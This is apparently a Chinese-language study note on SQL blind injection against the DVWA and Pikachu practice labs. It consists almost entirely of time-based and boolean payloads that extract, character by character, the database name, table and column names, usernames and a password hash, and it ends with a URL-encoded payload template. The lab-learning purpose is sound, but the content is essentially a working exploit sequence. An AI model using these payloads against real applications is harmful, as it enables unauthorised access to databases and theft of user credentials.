SQL盲注流程
判断是否存在注入点 字符型_exp(1' and 1=1# 1' and 1=2#) 数字型不用闭合单双引号
猜测数据库名字符串长度 exp(1' and length(database())=1#)
猜测数据库名称
猜测数据表个数
猜测数据表名长度
获取数据表名称
猜测数据表字段个数
猜测数据表字段名长度
获取数据表字段值
获取数据
时间盲注(DVWA)
1:获取数据库名字符串长度
1' and if(length(database())=4,sleep(5),1)#
1.1:获取数据库名
1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)# 获取数据库名中第1个字符 d
1' and if(ascii(substr(database(),2,1))=118,sleep(5),1)# 获取数据库名中第2个字符 v
1' and if(ascii(substr(database(),3,1))=119,sleep(5),1)# 获取数据库名中第3个字符 w
1' and if(ascii(substr(database(),4,1))=97,sleep(5),1)# 获取数据库名中第4个字符 a
1' and if(((select database())='dvwa'),sleep(5),1)# 确认数据库名为dvwa
2:获取数据表名个数
1' and if((select count(table_name) from information_schema.TABLES WHERE TABLE_SCHEMA='dvwa') = 2,sleep(5),1)# 2个数据表
3:获取第一个数据表(guestbook)名字符串长度
1' and if(length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1))=9,sleep(5),1)#
3.1获取第一个数据表名的第一个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))=103,sleep(5),1)# g
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),2,1))=117,sleep(5),1)# u
获取第二张数据表(users)名字符串长度
1' and if(length((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1))=5,sleep(5),1)#
3.2获取第二个数据表名(users)字符串长度
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))=117,sleep(5),1)# u
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2,1))=115,sleep(5),1)# s
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),3,1))=101,sleep(5),1)# e
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),4,1))=114,sleep(5),1)# r
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),5,1))=115,sleep(5),1)# s
3.3获取users表中字段个数为8
1' and if((select count(*) from information_schema.columns where table_schema='dvwa' and table_name = 'users') =8,sleep(5),1)#
获取users表中第一个字段名称(user_id)
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))=117,sleep(5),1)# u
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),2,1))=115,sleep(5),1)# s
获取users表中第四个字段名称(user)
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))=117,sleep(5),1)# u
布尔盲注(pikachu)
1:获取数据库名长度
admin' and length(database())=7 #
1.1:获取数据库的名称
admin' and ascii(substr(database(),1,1))=112# p
admin' and ascii(substr(database(),2,1))=105# i
admin' and ascii(substr(database(),3,1))=107# k
admin' and ascii(substr(database(),4,1))=97 # a
admin' and ascii(substr(database(),5,1))=99 # c
admin' and ascii(substr(database(),6,1))=104 # h
admin' and ascii(substr(database(),7,1))=117 # u
2获取pikachu数据库数据表个数
admin' and (select count(table_name) from information_schema.tables where table_schema='pikachu')=5#
2.1获取pikachu数据库第一个数据表名长度(httpinfo)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 0,1)=8)#
2.2获取pikachu数据库第二个数据表名长度(member)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 1,1)=6)#
2.3获取pikachu数据库第三个数据表名长度(message)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 2,1)=7)#
2.4获取pikachu数据库第四个数据表名长度(users)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 3,1)=5)#
2.5获取pikachu数据库第五个数据表名长度(xssblind)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 4,1)=8)#
2.2获取pikachu数据库第一张数据表名称(httpinfo)
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=104#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),2,1))=116#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),3,1))=116#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),4,1))=112#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),5,1))=105#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),6,1))=110#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),7,1))=102#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),8,1))=111#
2.3获取pikachu数据库第四张数据表名称(users)
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),1,1))=117#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),2,1))=115#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),3,1))=101#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),4,1))=114#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),5,1))=115#
3:获取httpinfo表中字段个数
admin' and ((select count(column_name) from information_schema.columns where table_schema='pikachu' and table_name='httpinfo')=6)#
3.1:获取users表中字段个数
admin' and ((select count(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users')=4)#
3.2:获取users表第一个字段名称长度(id)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1)=2)#
获取users表第二个字段名称长度(username)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1)=8)#
获取users表第三个字段名称长度(password)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1)=8)#
获取users表第四个字段名称长度(level)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 3,1)=5)#
3.3获取pikachu数据库第一个字段名称(id)
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),1,1))=105#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),2,1))=100#
3.4获取pikachu数据库第二个字段名称(username)
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),1,1))=117#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),2,1))=115#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),3,1))=101#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),4,1))=114#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),5,1))=110#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),6,1))=97#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),7,1))=109#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),8,1))=101#
3.4获取pikachu数据库第三个字段名称(password)
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1),1,1))=112#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1),2,1))=97#
3.5获取users表第一个字段名称内容(1,2,3)
admin' and ascii(substr((select id from users limit 0,1),1,1))=49#
admin' and ascii(substr((select id from users limit 1,1),1,1))=50#
admin' and ascii(substr((select id from users limit 2,1),1,1))=51#
3.6获取users表第二个字段名称内容(admin)
admin' and ascii(substr((select username from users limit 0,1),1,1))=97#
admin' and ascii(substr((select username from users limit 0,1),2,1))=100#
admin' and ascii(substr((select username from users limit 0,1),3,1))=109#
admin' and ascii(substr((select username from users limit 0,1),4,1))=105#
admin' and ascii(substr((select username from users limit 0,1),5,1))=110#
3.7获取users表第三个字段名称内容(e10adc3949ba59abbe56e057f20f883e)
admin' and ascii(substr((select password from users limit 0,1),1,1))=101#
%27+and+ascii%28substr%28%28select+password+from+users+limit+0%2C1%29%2C{}%2C1%29%29%3D101%23
admin' and ascii(substr((select password from users limit 0,1),2,1))=49#